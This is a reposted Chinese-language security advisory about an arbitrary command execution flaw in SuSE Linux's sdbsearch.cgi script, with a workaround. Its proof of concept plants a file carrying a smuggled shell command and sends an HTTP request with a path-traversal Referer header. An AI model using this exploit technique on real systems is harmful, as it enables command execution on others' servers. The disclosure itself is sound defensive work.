SuSE linux sdbsearch.cgi执行任意代码漏洞
2008-04-09 04:27:56来源:互联网 阅读 ()
发布日期:2001-08-02
更新日期:2001-08-03
受影响系统:
描述:
SuSE Linux 6.x
SuSE Linux 7.1
SuSE Linux 7.2
SuSE Linux发行版中带了一个名为'sdbsearch.cgi'的perl脚本。
它存在一个安全问题,可能导致攻击者执行任意命令。
这个脚本信任客户端发送的HTTP请求中的HTTP_REFERER变量的内容。'sdbsearch.cgi'
利用它来作为关键字来定位文件。如果攻击者可以设法上传一个包含特定内容的文件,
'sdbsearch.cgi'将会使用open()调用来打开匹配的文件。如果文件中包含管道符等shell
元字符,攻击者就可能以httpd运行身份执行任意命令。
<*来源:Maurycy Prodeus (z33d@eth-security.net) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Maurycy Prodeus (z33d@eth-security.net)提供了如下测试方法:
首先攻击者要设法上传一个"keylist.txt"的文件。
如果在本机测试可以执行如下操作:
$ echo -e "keyword\0touch exploitable|" > /tmp/keylist.txt
向目标主机发送如下HTTP请求:
GET /cgi-bin/sdbsearch.cgi?stichwort=keyword HTTP/1.0
Referer: http://szachy.org/../../../../../tmp
这将会在/tmp/下创建'exploitable'文件。
建议:
临时解决方法:
暂时禁止此CGI脚本的执行权限。或者将其移出/cgi-bin/目录。
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.suse.com/
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash